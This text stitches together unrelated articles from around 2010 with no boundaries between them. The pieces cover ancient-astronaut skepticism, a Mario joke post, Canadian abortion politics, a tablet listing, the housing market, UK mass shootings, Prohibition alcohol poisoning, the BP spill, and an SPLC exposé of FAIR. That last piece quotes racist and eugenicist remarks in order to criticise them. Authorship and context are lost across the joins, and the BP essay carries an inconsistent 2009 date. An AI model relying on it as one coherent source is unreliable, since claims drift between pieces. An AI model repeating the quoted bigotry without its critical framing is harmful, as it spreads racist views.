However , the mistake made by many of the idea ’s proponents is in assuming that since alien life is possible and our ancestors have fanciful tales of gods coming from the skies in bizarre contraptions , it means that the gods in question are best explained by alien visitors from another world who inspired us to build monuments like the Pyramids of Giza and Stonehenge .
These are the claims made by the publisher of Legendary Times , an ancient astronaut theorist magazine in the tradition of Erich von Daniken , claims that went unchallenged by the experts featured in the same episode of Known Universe .
Even stranger is that Giorgio A. Tsoukalos , one of von Daniken ’s disciples and the publisher in question , has already been featured by a few skeptical shows on NatGeo and his arguments were often shot down by anthropologists and archeologists .
So why not now ?
Why did the editors choose to highlight numerology done with the Great Pyramid , tales of Hindi gods cast as aliens flying around India in strange spacecraft , and the novel notion of Stonehenge being a model of a solar system as well as the legend of the dark companion of Sirius ?
We ’ve encountered numerology applied to ancient myths and legends before , specifically in the stories of the supposed discovery of ancient navigation systems and the so - called God equation of Stonehenge .
With a big enough repository of simple math tricks , you can derive pretty much anything you want from any object you can find .
There are no rules in numerology so you can turn any angle into a significant correlation , drop a few decimal points here and there until you put together some sort of pattern , and call whatever you get a from all your measuring , dividing and substituting a momentous discovery .
Likewise , interpreting ancient gods of very old civilizations with our modern , space age sensibilities is just an exercise in connecting random dots until a picture you want to see starts to emerge .
The Hindi gods roaming around the skies on chariots of fire should not be taken as a description of literal history .
It ’s not like our ancestors did n’t have imaginations and could n’t create some very bizarre and fanciful tales , and it ’s not like we ca n’t contaminate a retelling of their legends if we think we discovered something important as is the case with the Sirius myth of the Dogon .
While it ’s often cited by ancient astronaut theorists as one of the best cases of extraterrestrial contact , it ’s far more likely to be a product of highly selective retellings of Dogon folklore in the 1960s instead .
And here is where we come to the main problem with the ancient astronaut theory .
It relies very heavily on the personal opinions and subjective evaluations of the investigators .
A set of concentric circles , or a big pyramid complex suddenly turn into models of the solar system .
Statues of demons , imps and gods become accurate depictions of alien astronauts , and the highly inconsistent figures across societies are chalked up simply to a cultural bias in representations of otherworldly beings .
Paintings and carvings of mythological stories , or very simple corrections in rock carvings turn into strange alien craft and modern tools forgotten by time .
Just like a lot of faithful tend to see faces of religious figures in fields , clouds and on toast , ancient astronaut theorists are often victims of wishful pareidolia .
Unless we can turn up a fossilized spacecraft filled with stone relics crafted by humans and clearly once occupied by an intelligent , extraterrestrial species , it ’s impossible to offer any real proof that we ’ve been visited by aliens in the ancient past .
Of course , proponents like von Daniken , Tsoukalos , and Pye , who claims to have the skull of a human / alien hybrid in his possession , know this full well .
And this is why they like to frame their claims as questions , using ambiguity and uncertainty as their shields , and why popular science shows that choose to feature them have to take issue with their claims to make sure that the audience is given accurate , realistic and scientifically sound facts at the end of the program .
Using eight images , game designer Zack Hiwiller shows us what Super Mario Bros.
might look like , if it was made with modern sensibilities .
Author 's Note :
While this post is meant to be humorous , it is n't meant to be humorous at the expense of my fellow designers .
I know we all try to do what is best for our games , so do n't take offense guys !
It 's just pining for a simpler time …
Advertisement
If Mario was first designed in 2010 , he 'd probably have to adopt some of our modern trends .
Advertisement
Thirty minutes later …
G/O Media may get a commission Subscribe and Get Your First Bag Free Promo Code AtlasCoffeeDay20
Advertisement
Maybe this warp pipe is safe .
Advertisement
Damnit .
Zack Hiwiller is a professional game designer living in New York City .
He writes about games and the industry on his blog ( http://www.hiwiller.com) when the server is n't a smoldering mess .
If you are a board game publisher , contact him .
He 's got some prototypes to show ...
An interesting statistic was released last week in Canada : According to the Sex Information and Education Council , the nation 's teenage birth and abortion rate fell 36.9 % between 1996 and 2006 .
The lead researcher of the report , Alexander McKay , told the Globe and Mail that the decline reflected Canada 's attitude toward the issue – that the more societies have an " accepting attitude " to teenage pregnancy , the less of it one finds .
As for abortion , McKay said : " It 's not that young women are viewing abortion as a form of birth control .
Rather they do view it as an acceptable – although regrettable – way of dealing with an unwanted pregnancy when it occurs . "
As the host government for the upcoming G8 and G20 meetings near the end of June in Ontario , Stephen Harper 's Conservative party has planned to make funding for maternal health in developing nations a priority topic .
However , that discussion will take place with the knowledge that Canada 's financial contribution to family planning programmes will not include funding for abortions .
That is to say , the Tories are not about to allow women from developing nations the same kind choice that women in Canada have .
Why not ?
In late April , when he was asked how the federal Liberal party might try to shake itself from its current stagnant position in the polls , Ekos Research pollster Frank Graves made some interesting remarks to Lawrence Martin of the Globe and Mail .
Graves said that he'd told the Liberals to :
" Invoke a culture war .
Cosmopolitanism versus parochialism , secularism versus moralism , Obama versus Palin , tolerance versus racism and homophobia , democracy versus autocracy .
If the cranky old men in Alberta do n't like it , too bad .
Go south and vote for Palin . "
The cranky ( not so old ) men did n't like it .
Graves appeared on the CBC's Power & Politics to explain his quote and debated with former Tory spokesman Kory Teneycke , who called his comments " offensive " .
A brief national media debate followed , centered on the notion of a Canadian " culture war " – one that might pit Canuck versus Canuck on the nation 's ideological battleground – as if it were an unheard - of possibility .
The thing is , Graves 's comments , while somewhat incendiary , trampled upon a silent rift in Canadian society – one that Harper is currently exploiting : the rise of social conservatism in a nation that has historically viewed itself as socially progressive .
Harper 's life is no stranger to the influence of faith - based social conservatism and the perceived threat of moral relativism .
After all , his political career began under the watch of the " Calgary School " as an early adviser to the now - defunct Reform party that was born in the University of Calgary 's political science department .
His direct mentor in those early years was Preston Manning , founder of the Reform party and son of former Alberta premier and evangelical radio host ( simultaneously ) , Ernest Manning .
In 2003 , when Harper was still the leader of the Canadian Alliance party ( a successor to the Reform party ) , he gave a speech to British thinktank Civitas .
He said :
" Rebalancing the conservative agenda will require careful political judgment .
First , the issues must be chosen carefully .
For example , the social conservative issues we choose should not be denominational , but should unite social conservatives of different denominations and even different faiths . "
For the most part , Harper 's successive minority governments have followed this train of thought .
Some have alleged that Harper , who " found " religion while in Calgary , is at the heart of a national cabal of evangelicals pushing to reinstate Canada as a Christian nation that must fulfill its destiny as laid out in its national motto ( " He shall have dominion also from sea to sea , " from Psalm 72:8 - 9 ) before the End Times .
But the fact is that he is probably much more cerebral , critical , and calculating than that .
To that effect , many of Harper 's more contentious social policy moves have been designed to evoke conservative morality rather than religiosity .
Whether it has been the party 's stance on youth crime , raising the age of sexual consent , or its persistent attempts to close Vancouver 's safe drug injection programme , Insite , the Harper government has a record of presenting Canadians not with specifically faith - based policy , but moral wedge issues .
What this means for the average Canadian is that , slowly but surely , the Conservative party is changing the framework of the national debate .
Harper 's Tories are picking their issues carefully , and appealing to those centre - right voters who have historically sided with the Liberals .
The culture war that Graves alluded to is effectively already under way : the progressive Canada that dominated the latter half of the 20th century – the one that legalised the pill , sodomy , abortion , and gay marriage – is changing , buried incrementally by calculated socially conservative policies .
While the press debated Graves 's comments , the question on maternal health funding was playing out in parliament .
The opposition Liberals half - heartedly pressed the Tories on the abortion funding , but so lax was their willingness to debate the issue , Liberal leader Michael Ignatieff 's motion on the topic died thanks to the absence of 13 of his own party members .
This was partly due to party disorganisation , but it implies an unwillingness to engage in the debate .
Since his government 's decision not to fund legal abortions overseas , Harper has been adamant that he had no desire to re-open the debate on abortions in Canada , saying he would " oppose " such a move .
In doing so , Harper has steered clear of a faith - based domestic political landmine , relegating it to the realm of foreign policy , and effectively out of the minds of most Canadians .
At the same time , he has given the suggestion of landing on the righteous side of a religiously charged debate , while keeping himself at arm 's length .
This way , Harper does n't alienate himself from the average Canadian – particularly the centre - right voters .
It is a repeated , adept , but not at all secretive , pattern of finding and exploiting those secular issues that strike at the heart of a silently religious nation .
It all means that the decision not to allow funding for safe abortions in developing nations most likely has very little to do with the security and health of the approximately 70,000 women who die annually during unsafe ones .
Instead , it has everything to do with the Conservative party 's own domestic political gains , and pandering to a lucrative – and growing – conservative base .
It 's decidedly cynical , but it seems to have worked .
A recent poll found that , though 58 % of Canadians said they were against the government 's decision , it was those in favour of the move who held the biggest ever pro-life rally on Parliament Hill to celebrate it .
The Huawei S7 Android tablet is a 7 inch touchscreen device with an 800 x 480 pixel capacitive display .
It runs Google Android 2.1 , and Chippy from CarryPad thought it was one of the coolest things he saw at Computex earlier this month .
The tablet has a 768MHz Qualcomm Snapdragon processor , 256MB of RAM , and a microSD card for storage .
It supports 802.11b/g/n WiFi , Bluetooth 2.1 , and HSPA / UMTS 3G connectivity .
And it ’s available for purchase in the US and UK .
Expansys is selling the Huawei S7 for £ 299.99 in the UK , where the store says it can deliver the tablet within 10 days .
Expansys - USA also has a listing for the Huawei S7 , which is selling for $ 354.99 in the states .
But it wo n’t be available until July 7th .
via EuroDroid
Share this article : Share this : Facebook
Twitter
Reddit
Pocket
Tumblr
Pinterest
LinkedIn
Email
The April Case - Schiller report tells us very little .
The 3.8 % average rise reflects the end of home buyer tax credit .
Sales and prices have evaporated since May 1 .
The CS index will tell us a much different story when the data is released 30/60 days from now .
While the April report provides little insight as to where we are today there is some interesting information that is worth noting .
Of the 20 cities the CS index tracks 18 showed price increases .
The two that fell were Miami ( -.8 % ) and NY ( -.3 % ) .
With that in mind consider this chart :
The information is based on April data and is therefore consistent with the CS report .
Both New York and Florida are at the top of the list of states with the longest period between initial default and final foreclosure .
For the nation as a whole the number of days has nearly doubled over the past few years .
NY and Florida are 31 % and 21 % higher than the national average .
This is not a coincidence .
This is cause and affect in action .
I live in metro NYC and own property in S.Fl .
I see what is going on .
There are many middle to upper price homes on the market that have not seen an offer for more than a year .
A good number of these are already in default .
The borrowers are underwater and there is nothing they can do .
A HAMP style ReFi accomplishes nothing .
I know people in both areas who have contacted their lender and have been told to come up with an acceptable short sale or deed in lieu transaction .
The borrowers have been told by the bank (s ) that if they do not cooperate they will have their credit wrecked and be subject to default judgments .
So the borrower puts the house on the market and hopes for an offer that is acceptable to the lender .
In the mean time they stay in the home for up to two years and pay very little ( if anything ) on the old mortgage .
There is substantial evidence that these people are buying IPhones and going on vacation with the money they are saving by not paying the debt .
Some thoughts :
- This “ extend and pretend ” at its worst .
- The lenders will not let this continue forever .
The day of reckoning is coming .
It well be felt in all of the states .
It will be felt hardest in the states that have the highest days to foreclosure numbers .
- As a former owner is foreclosed they will be forced to rent .
Given that few in this category are paying any meaningful amount of their current monthly mortgage it is likely that they will have less disposable income post foreclosure .
- My conclusions :
(A) RE in Fl and NY is going to tank this fall .
( B) Consumer demand for things from clothes , gadgets and leisure is going to suffer an out sized decline .
(C) The extend and pretend policy is catching up with us .
This approach was a “ buy some time ” idea in the hope that things would work out .
They have not worked out .
We are about to pay the price for that failure .
If we revert to more traditional levels in the ratio of initial default and foreclosure we are going to hit an economic wall .
This is just one more thing stacking up against us .
This guest post comes from Bruce Krasting 's blog >
Multiple shootings are extremely rare in the UK and most incidents involving two or more deaths have been related to organised crime , such as feuds between drug dealers or gangs .
The Cumbria incident is the third mass - shooting incident in the UK in which a lone gunman has roamed around seeking out victims .
Each of the previous incidents led to greater restrictions on firearms .
Hungerford : 19 August 1987
Image caption Michael Ryan : Owned semi-automatic weapons
This quiet Berkshire town became the scene of a massive emergency when 27 - year - old Michael Ryan shot and killed 16 people .
He seriously wounded a further 15 .
Ryan was dressed in combat - style camouflage clothing and roamed the area armed with a semi-automatic rifle and pistol .
The rifle was so powerful it could accurately hit targets from 300 metres .
He apparently chose his victims at random .
His first victim was a woman who was enjoying a picnic with her children .
Emergency services were later called to an address where they found the body of Ryan 's mother .
By late lunchtime , Ryan had moved into Hungerford 's shopping centre and was firing indiscriminately at anyone who came into view .
He shot one police officer who tried to tackle him .
Armed officers were brought in to surround the area , using helicopters to try to track the gunman down .
He managed to evade them for much of the afternoon until he was found hiding in a school on the edge of the town .
Negotiators arrived to try to get Ryan to surrender , but he turned the gun on himself .
Local people who knew Ryan described him as a loner and gun fanatic .
In the aftermath of the incident , Parliament introduced tighter restrictions on gun ownership with the Firearms ( Amendment ) Act 1988 .
The Act banned the ownership of semi-automatic and pump-action rifles , weapons which fire explosive ammunition , short shotguns with magazines and elevated pump-action and self - loading rifles .
Anyone who wanted to own a shotgun , such as farmers , was told they would need to be registered and would be required to keep it locked in secure storage .
Registration was also made mandatory for shotguns .
The killings also led to a rethink and modernisation of police communications and preparedness for such incidents .
The local police were simply not trained to deal with such a dangerous situation - and the team manning the 999 emergency phone line were not able to deal with the volume of calls coming in .
Dunblane : 13 March 1996
Image caption Dunblane : Teacher died trying to protect children
The worst shooting in the UK happened in 1996 when Thomas Hamilton killed 16 children and their teacher when he attacked a school in Dunblane .
He injured 13 other children and three teachers before killing himself .
The attack and killing happened very quickly .
Hamilton , a 43 - year - old walked into the school and began firing in all directions as the Year One pupils - children aged five and six - were beginning an exercise class with their teacher , Gwen Mayor .
She died trying to protect the children as Hamilton began firing .
Hamilton walked out of the gymnasium and attacked another classroom and staff but then returned to the gym where he shot himself .
The killing stunned the UK and a subsequent public inquiry revealed that police had investigated Hamilton after complaints about his behaviour around young boys .
He had licences for six guns and police had not asked him why he needed so many firearms .
But the inquiry concluded that nobody could have predicted his actions .
The deaths led to a nationwide campaign for even greater gun controls .
The campaign succeeded in making it illegal to buy or possess a handgun , something which had been excluded from the legislation passed after Hungerford .
( Natural News )
In a dark but little - known chapter of U.S. history , the federal government ordered the poisoning of alcohol supplies to deter and punish those who sought to flout Prohibition - era bans .
Starting in 1906 , the United States began requiring manufacturers of industrial ethanol to put the chemical through a process to distinguish it from the identical substance found in alcoholic beverages .
After the manufacture , sale and transportation of alcohol was banned by the 18th Amendment and the government cracked down on smuggling operations , bootleggers turned to chemistry to keep their customers supplied .
A simple process was used to extract toxic chemicals from the industrial alcohol used in paints , solvents , fuels and medicine , and this relatively clean alcohol was then used to make beverages .
By the mid-1920s , an estimated 60 million gallons of industrial alcohol were being stolen per year .
In response , the administration of President Calvin Coolidge ordered industry to add higher levels of more difficult - to - remove poisons to their alcohol , including acetone , benzene , cadmium , camphor , carbolic acid , chloroform , ether , formaldehyde , gasoline , iodine , kerosene , methyl alcohol , mercury salts , nicotine , quinine and zinc .
Shortly after the institution of this campaign , 31 people were poisoned to death over the course of the Christmas holiday in New York City alone .
Historians estimate that a total of 10,000 people were killed by the program before Prohibition ended in 1933 .
The poisoning program was no secret , as the government hoped that knowledge of it would deter people from drinking -- although consumption of alcohol was not itself illegal .
"
The government knows it is not stopping drinking by putting poison in alcohol , " said New York City medical examiner Charles Norris .
" [ Y ]et it continues its poisoning processes , heedless of the fact that people determined to drink are daily absorbing that poison .
Knowing this to be true , the United States government must be charged with the moral responsibility for the deaths that poisoned liquor causes .
" Sources for this story include : http://www.slate.com/id/2245188/pagenum/all/
I published an essay on the spill shortly after it happened in which I predicted that this would be a death blow for deepwater drilling in the U.S.
Only time will tell on that one , but it has clearly changed the debate drastically .
No longer can drilling proponents point to decades of safe operation .
No more can they reassure people that something like this ca n’t happen .
And in that case , what are the chances that new areas off the coasts of Virginia , Florida , or California are going to be opened up to drilling ?
Slim to none .
It was about six weeks ago that the man I work for walked into my office and asked what was happening in the world of energy .
“ This oil leak in the Gulf of Mexico ” , I told him , “ is going to be a monumental disaster . ”
He had n’t heard about it yet , but my views on it at the time were 1 ) .
They were n’t going to have an easy time getting the leak stopped ; 2 ) .
It would drastically shift the debate on offshore drilling .
The latest news per the Wall Street Journal is that “ the Obama administration announced a six - month moratorium on all offshore drilling and canceled exploration lease sales in the Gulf of Mexico and off the Virginia coast . ”
( That moratorium is on deepwater projects ; a temporary ban on shallow - water projects has expired .
Update 06/03/09 :
The moratorium has been extended to include all new drilling in the Gulf of Mexico according to a Minerals Management Service , e-mail obtained by the AP ) .
And frankly , as someone who has argued that the U.S. needs to invest in more offshore drilling lest we face oil shortages and increasing dependence on other countries for our energy , I ca n’t make that argument in light of this sort of disaster .
We may need drilling , but we also need our coastlines .
If the choice is to deal with oil shortages or risk a disaster off the coast of Florida , I am going to vote to live with shortages .
I know that when the shortages occur , we will probably try to drill anywhere and everywhere out of desperation .
I believe I understand what the consequences of shortages may look like – hence my support for expanded drilling .
But this disaster has convinced me that we have exceeded the depths at which we can safely drill and extract oil .
There will always be human error , and there will always be companies willing to take shortcuts .
When the consequences are potentially severe , you have to play it safe .
But that ’s a digression from the title of this article .
When the BP disaster in Texas City occurred in 2005 – killing 15 people and doing a great deal of damage – it was a serious blow to the company ’s image .
They had carefully crafted the image of a company – now rebranded Beyond Petroleum from British Petroleum – that was moving away from oil .
They deeply cared about the environment and were moving the company in a new , greener direction .
Then the explosion happened and the world was focused on BP the oil company .
While it was n’t a death blow for the company , their carefully crafted image vanished in the eyes of many people .
For many , they were simply an oil company trying to convince people they were something beyond that .
With the latest disaster – which many have already categorized as the worst environmental disaster in U.S. history – BP ’s image has likely taken a death blow .
Sure , ExxonMobil survived the Valdez disaster , but it was a stain on their corporate image that will last forever .
But unlike BP , ExxonMobil never pretended to be anything other than an oil company .
Still , ExxonMobil since then has been viewed by many as the epitome of the greedy , dirty oil company .
The situation that has constantly come to my mind is the Bhopal disaster and the subsequent fallout .
For those who are unfamiliar , in 1984 an accident at a Union Carbide plant in Bhopal , India wrought terrible destruction on the population there .
The official immediate death toll was 2,259 , but it has been estimated that ultimately more than 15,000 people died as a result of the incident .
As a result of this tragedy , Union Carbide ’s reputation was destroyed .
They would forever be viewed by many as a company with lax safety standards who put profits ahead of lives .
They continued to function as an independent company for a number of years as the inevitable lawsuits played out , but this former component of the Dow Jones Industrial Average was ultimately swallowed up by the Dow Chemical Company .
It is hard for me to envision a different fate for BP .
While the nature of these incidents is certainly different ( I do n’t mean to imply that the oil spill is comparable to thousands of people dead in India ) , BP will now forever be viewed as the worst kind of corporate polluter .
That is simply reality .
Many people will make it a point to never buy BP products again .
Investors who bought into the rebranding – and hung around after Texas City – may have had their fill .
There can be no rebranding in the aftermath of this .
BP ’s stock has been pummeled in the aftermath of the disaster , and now a criminal probe has been launched .
The witch hunt is on , and it promises to keep BP in the hot seat for a very long time .
We will be bombarded with anti-BP news for years to come .
In any case , the name BP will not disappear overnight .
BP ’s refineries , oil rigs , and chemical plants will continue to operate .
Union Carbide ’s lawsuits took years to work their way through the courts before Dow bought them out .
I think the same will hold true for BP .
And although BP has long been a source of pride with many Brits , I can only wonder now if in the future we will refer to them as “ BP , a subsidiary of ExxonMobil . ”
Editor ’s Note : After issuing this report in December 2007 , the Southern Poverty Law Center added the Federation for American Immigration Reform to its list of hate groups .
The forces seeking to sharply reduce the number of immigrants coming to America won a stunning victory last June , when nativist anger at an " amnesty " for the undocumented scuttled a major bipartisan immigration reform package backed by President Bush .
Many members of Congress were completely unprepared for the flood of angry E- mails , phone calls and faxes they received — an inundation so massive that the phone system collapsed under the weight of more than 400,000 faxes .
They should not have been surprised .
The furious nativist tide was largely driven by an array of immigration restriction organizations that has been built up over the course of more than 20 years into fixtures in the nation 's capital .
The vast majority of these groups were founded or funded by John Tanton , a major architect of the contemporary nativist movement who , 20 years ago , was already warning of a destructive " Latin onslaught " heading to the United States .
Most of these organizations used their vast resources in the days leading up to a vote on the bill to stir up a nativist backlash that ultimately resulted in its death .
At the center of the Tanton web is the nonprofit Federation for American Immigration Reform ( FAIR ) , the most important organization fueling the backlash against immigration .
Founded by Tanton in 1979 , FAIR has long been marked by anti-Latino and anti-Catholic attitudes .
It has mixed this bigotry with a fondness for eugenics , the idea of breeding better humans discredited by its Nazi associations .
It has accepted $ 1.2 million from an infamous , racist eugenics foundation .
It has employed officials in key positions who are also members of white supremacist groups .
Recently , it has promoted racist conspiracy theories about Mexico 's secret designs on the American Southwest and an alternative theory alleging secret plans to merge the United States , Mexico and Canada .
Just last February , a senior FAIR official sought " advice " from the leaders of a racist Belgian political party .
FAIR officials declined repeated requests for comment .
None of this — or any other material evidencing the bigotry and racism that courses through the group — seems to have affected FAIR 's media standing .
In just the first 10 months of 2007 , the group was quoted in mainstream media outlets nearly 500 times with virtually no mention of its more unsavory aspects .
FAIR President Dan Stein was featured on CNN's " Lou Dobbs Tonight " at least 12 times in the same period , along with countless appearances on other television news shows .
And , perhaps most remarkably of all , FAIR has been taken seriously by Congress , which has called upon its officials to testify on immigration more than 30 times since 2000 .
" The sad fact is that attempts to reform our immigration system are being sabotaged by organizations fueled by hate , " said Henry Fernandez , a senior fellow and expert on immigration at the Center for American Progress , a " progressive " think tank .
" Many anti-immigrant leaders have backgrounds that should disqualify them from even participating in mainstream debate , yet the American press quotes them without ever noting their bizarre and often racist beliefs . "
FAIR official Dan Stein , second from left , testified before a House Judiciary subcommittee in 2003 , one of 30 FAIR appearances before Congress since 2000 .
FAIR 's opinion is sought despite its well - documented links to extremism .
The Founder : Early Hints
For decades , John Tanton has operated a nativist empire out of his U.S. Inc. foundation 's headquarters in Petoskey , Mich .
Even as he simultaneously runs his own hate group —
The Social Contract Press , listed for many years by the Southern Poverty Law Center because of its anti-Latino and white supremacist writings — Tanton has remained the house intellectual for FAIR .
In fact , U.S. Inc. bankrolls much of FAIR 's lobbying activity and , at least until 2005 , Tanton ran its Research and Publications Committee , the group that fashions and then disseminates FAIR 's position papers .
In its 2004 annual report , FAIR highlighted its own main ideologue , singing Tanton 's praises for " visionary qualities that have not waned one bit . "
But what , exactly , is Tanton 's vision ?
As long ago as 1988 , when a series of internal 1986 documents known as the WITAN memos were leaked to the press , Tanton 's bigoted attitudes have been known .
In the memos , written to colleagues on the staff of FAIR , Tanton warned of a coming " Latin onslaught " and worried that high Latino birth rates would lead " the present majority to hand over its political power to a group that is simply more fertile . "
Tanton repeatedly demeaned Latinos in the memos , asking whether they would " bring with them the tradition of the mordida [ bribe ] , the lack of involvement in public affairs " and also questioning Latinos ' " educability . "
Echoing his 19th - century nativist forebears who feared Catholic immigrants from Italy and Ireland , Tanton has often attacked Catholics in terms not so different from those used by the Klan and the Know - Nothing Party of the 1840s .
In the WITAN memos , for instance , he worried that Latino immigrants would endanger the separation of church and state and undermine support for public schooling .
Never one to miss a threatening and fertile Catholic , Tanton even reminded his colleagues , " Keep in mind that many of the Vietnamese coming in are also Catholic . "
The leaked memos caused an uproar .
Arnold Schwarzenegger and Walter Cronkite quit the board of a group Tanton headed , U.S. English , after the memos became public in 1988 .
U.S. English Executive Director Linda Chavez — a former Reagan Administration official and , later , a conservative commentator — also left , calling Tanton 's views " anti-Hispanic , anti-Catholic and not excusable . "
In 1994 , Tanton 's Social Contract Press republished an openly racist French book , The Camp of the Saints , with Tanton writing that he was " honored " to republish the race war novel .
What Tanton called a " prescient " book describes the takeover of France by " swarthy hordes " of Indians , " grotesque little beggars from the streets of Calcutta , " who arrive in a desperate refugee flotilla .
It attacks white liberals who , rather than turn the Indians away , " empty out all our hospital beds so that cholera - ridden and leprous wretches could sprawl between white sheets … and cram our nurseries full of monster children . "
It explains how , after the Indians take over France , white women are sent to a " w---- house for Hindus . "
In an afterword special to Tanton 's edition of the novel , author Jean Raspail wrote about his fears that " the proliferation of other races dooms our race , my race , to extinction . "
Tanton 's view of the book he published ?
" We are indebted to Jean Raspail for his insights into the human condition , and for being 20 years ahead of this time .
History will judge him more kindly than have some of his contemporaries . "
Tanton has repeatedly suggested that racial conflict will be the outcome of immigration , saying in the WITAN memos that " an explosion " could be the result of whites ' declining " power and control over their lives . "
More than a decade later , in 1998 , he made a similar point in an interview with a reporter , suggesting that whites would inevitably develop a racial consciousness because " most people do n't want to disappear into the dustbin of history . "
Tanton added that once whites did become racially conscious , the result would be " the war of each against all . "
In 1997 , Tanton spelled out his views on the inevitability of immigration overwhelming American whites .
" In the bacteriology lab , we have culture plates , " he explained .
" You put a bug in there and it starts growing and gets bigger and bigger .
And it grows until it finally fills the whole plate .
And it crashes and dies . "
The Founder 's Friends
It 's no surprise that Tanton employs people with similar views .
His long - time deputy , for example , is Wayne Lutton , who works out of Tanton 's Petoskey offices and edits the journal , The Social Contract , published by Tanton 's press .
Lutton is not just linked to white supremacist ideas , many of which he publishes in his journal — he has actually held leadership positions in four white nationalist hate groups : the Council of Conservative Citizens , the National Policy Institute , and The Occidental Quarterly and American Renaissance , both racist publications .
Lutton has written for the Journal of Historical Review , which specializes in Holocaust denial .
Early on , Lutton and Tanton collaborated on The Immigration Invasion , a nativist screed that has been seized by Canadian border officials as hateful contraband .
Joe Turner started the group SaveOurState.org , which tolerates neo- Nazis ' presence at anti-immigration rallies .
Under Lutton 's editorial leadership , Tanton 's journal has published dozens of articles from prominent white supremacists .
One special issue was even devoted to the theme of " Europhobia : The Hostility Toward European - Descended Americans " and featured a lead article from John Vinson , head of the Tanton - backed hate group , the American Immigration Control Foundation .
Vinson argued that multiculturalism was replacing " successful Euro - American culture " with " dysfunctional Third World cultures . "
Tanton elaborated in his own remarks , decrying the " unwarranted hatred and fear " of whites that he blamed on " multiculturalists " and immigrants .
Presumably , these articles and more are well known to Stein , the president of FAIR — until 2003 , he was an editorial adviser to The Social Contract .
And Stein had lots of company .
FAIR board members Sharon Barnes and Diana Hull also have been on the journal 's board of editorial advisers .
FAIR 's current media director , Ira Mehlman , was an adviser in 2001 and 2002 , and his essay , " Grand Delusions : Open Borders Will Destroy Society , " was published in the journal 's pages .
Today , FAIR still advertises
The Social Contract on its website , saying the journal " offers in - depth studies on immigration , population , language , assimilation , environment , national unity and balance of individual rights and civil responsibilities . "
So where does FAIR stand on the matter of Tanton 's views ?
The group has never criticized or sought distance from its founder .
In 2004 , in fact , Stein insisted that Tanton " never asserted the inferiority or superiority of any racial , ethnic or religious group .
Never . "
The same year , FAIR hosted a gala event honoring Tanton for his 25 years of service .
To this day , Tanton remains on FAIR 's board .
The Eugenics Connection
Probably the best - known evidence of FAIR 's extremism is its acceptance of funds from a notorious , New York City - based hate group , the Pioneer Fund .
In the mid-1980s , when FAIR 's budgets were still in the hundreds of thousands of dollars , the group reached out to Pioneer Fund , which was established in 1937 to promote the racial stock of the original colonists , finance studies of race and intelligence , and foster policies of " racial betterment . "
( Pioneer has concentrated on studies meant to show that blacks are less intelligent than whites , but it has also backed nativist groups like ProjectUSA , run by former FAIR board member Craig Nelsen . )
Richard Lamm
The Pioneer Fund liked what it saw and , between 1985 and 1994 , disbursed about $ 1.2 million to FAIR .
In 1997 , when the Phoenix New Times confronted Tanton about the matter , he " claimed ignorance about the Pioneer Fund 's connection to numerous researchers seemingly intent on proving the inferiority of blacks , as well as its unsavory ties to Nazism . "
But he sounded a different tune in 2001 , when he insisted that he was " comfortable being in the company of other Pioneer Fund grantees . "
Today , Tanton 's defense is that he is no different than the " open borders crowd " that accepts money from the liberal Ford Foundation , which was founded by Henry Ford , the anti-Semitic auto manufacturer .
What he ignores is that the Ford Foundation , unlike the Pioneer Fund , is not promoting racist ideas .
Some have called for FAIR to return the Pioneer money , but that has not happened .
In fact , when asked about it in 1993 , Stein told a reporter , " My job is to get every dime of Pioneer 's money . "
One reason for Stein 's lack of hesitation may be that FAIR has long been interested in the pseudo - science of eugenics .
One of FAIR 's long - time leaders , and a personal hero to Tanton , is the late Garrett Hardin , a committed eugenicist and for years a professor of human ecology at the University of California .
Hardin , who died in 2003 , was himself a Pioneer Fund grantee , using the fund 's money to expand his 1968 essay , " The Tragedy of the Commons . "
In it , Hardin wrote , " Freedom to breed will bring ruin to all . "
Race War and the Duty to Die
That was the least of it .
In a 1992 interview with Omni magazine , Hardin said he supported abortion — " A fetus is of so little value , there 's no point worrying about it " — as " effective population control . "
He argued the Third World is filled with " the next generation of breeders " who need to be stopped .
He discouraged aid to starving Africans because that would only " encourage population growth . "
Hardin was n't alone .
A current FAIR board member , three - time Democratic governor of Colorado Richard Lamm , sounded a similar theme in 1984 , while still governor , saying " terminally ill people have a duty to die and get out of the way . "
Like Tanton , Lamm seems to fear a coming race war .
In his futuristic 1985 novel , Megatraumas : America at the Year 2000 , Lamm sketches it out like this : " [ O ] ur lack of control of our borders allowed 2 million legal and illegal immigrants to settle in the United States every year .
That caused unemployment to rise to 15.2 percent by 1990 and 19.1 percent this year . …
[ T ]he rash of firebombings throughout the Southwest , and the three - month siege of downtown San Diego in 1998 were all led by second - generation Hispanics , the children of immigrants . "
As late as 2004 , Lamm was sounding similar racial fears , telling a reporter that " new cultures " in the U.S. " are diluting what we are and who we are . "
For his part , Stein was asked about Hardin 's belief that only " intelligent people " should breed for an editorial by Tucker Carlson in the 1997 Wall Street Journal .
" Yeah , so what ? "
Stein replied .
" What is your problem with that ? "
After Hardin 's death , John Tanton created in honor of his mentor a group called The Garrett Hardin Society , devoted to " the preservation of [ Hardin 's ] writings and ideas . "
On the society 's board are Tanton , Wayne Lutton and U.S. Inc.'s recently appointed chief executive , John Rohe , the author of an adoring 2002 biography of Tanton and his wife that reads like the life of a saint .
Hiring Haters
In late 2006 , FAIR hired as its western field representative , a key organizing position , a man named Joseph Turner .
Turner was likely attractive to FAIR because he wrote what turned out to be a sort of model anti-illegal immigrant ordinance for the city of San Bernardino , Calif .
Based on Turner 's work , FAIR wrote a version of the law that is now promoted to many other cities .
( The law almost certainly violates the Constitution , but that has not stopped many municipalities ' interest . )
But there was more to Turner than FAIR let on .
In 2005 , Turner had created , and then led , a nativist group called Save Our State .
The group was remarkable for its failure to disassociate itself from the neo - Nazi skinheads who often joined its rallies — something that virtually all other nativist groups , worried about bad publicity , worked hard to do .
Save Our State 's electronic bulletin board , too , was remarkable for the racist vitriol that frequently appeared there .
It was in that forum that Turner made one of his more controversial remarks , amounting to a defense of white separatism .
" I can make the argument that just because one believes in white separatism that that does not make them a racist , " Turner wrote in 2005 .
" I can make the argument that someone who proclaims to be a white nationalist is n't necessarily a white supremacist .
I do n't think that standing up for your ‘ kind ' or ‘ your race ' makes you a bad person . "
The Southern Poverty Law Center has listed Save Our State as a hate group since it appeared in 2005 .
Turner 's predecessor in the FAIR organizing post , Rick Oltman , was cut from the same cloth .
Oltman has been described as a member of the Council of Conservative Citizens ( CCC ) in the publications of that hate group , which is directly descended from the segregationist White Citizens Councils and has described blacks as " a retrograde species of humanity . "
He has spoken at at least one of the CCC 's conferences and has taken part in one of its rallies .
And he was n't alone .
According to the CCC newsletter , FAIR 's longtime associate director , Dave Ray , was scheduled to speak at another CCC event .
